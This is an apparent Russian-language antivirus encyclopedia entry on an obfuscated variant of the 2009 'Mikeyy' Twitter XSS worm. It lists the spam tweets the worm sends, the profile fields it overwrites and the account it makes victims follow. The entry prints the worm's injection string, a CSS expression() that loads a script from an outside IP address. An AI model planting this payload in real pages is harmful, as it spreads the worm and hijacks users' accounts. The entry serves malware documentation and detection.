Другие модификации: .a, .b, .c, .d, .e, .f, .g
| Детектирование добавлено | 18 апр 2009 |
| Описание опубликовано | 22 апр 2009 |
Обфусцированный вариант червя.
Рассылаемые сообщения:
"Twitter, this sucks! Fix your coding".
"Twitter Security Team Really? You need to be fired".
"Horrible Coding! "
"@oprah - sup? welcome to twitter. - mikeyy"
"@aplusk - hey, homo. - mikeyy"
"@souljaboytellem - your music sucks dude. - mikeyy"
"@TheEllenShow - hey baby, love me long time? - mikeyy"
"@StephenColbert - you funny. - mikeyy"
"@cnnbrk - he's back. ;) - mikeyy"
"@nytimes - yep, it's true. - mikeyy"
"RT @mashable WARNING: Mikeyy Twitter Worm Returns!! - http://bit.ly/gxwHH"
"Twitter, do you know about the before_save model callback? - mikeyy"
"This exploit only affects Internet Explorer users. Thanks. - mikeyy"
"Twitter, BeforeSave: ForEach: DataArray: EscapeHtmlChars!!! - mikeyy "
"Get Firefox, thanks. www.Firefox.com"
"Twitter, you should be paying me now. - mikeyy"
Данный вариант червя изменяет параметр user[profile_sidebar_border_color],
устанавливая его значение на следующее:
000; } #notifications{width:
expression(document.body.appendChild(document.createElement('script')).src='http://74.200.253.195/xss.js')
В результате этого в профиле пользователя появляется ссылка на вредоносный
XSS-скрипт.
Кроме того, червь изменяет следующие параметры пользователя:
user[name]
user[url]
user[description]
user[location]
на значение "Mikeyy", таким образом отображая это значение на странице у
пользователя в полях Name, Location, Web, Bio.
Посылает POST-запрос на урл "/friendships/create/32336151", что соответствует
добавлению в друзья пользователя с id 32336151, с ником followmehah.
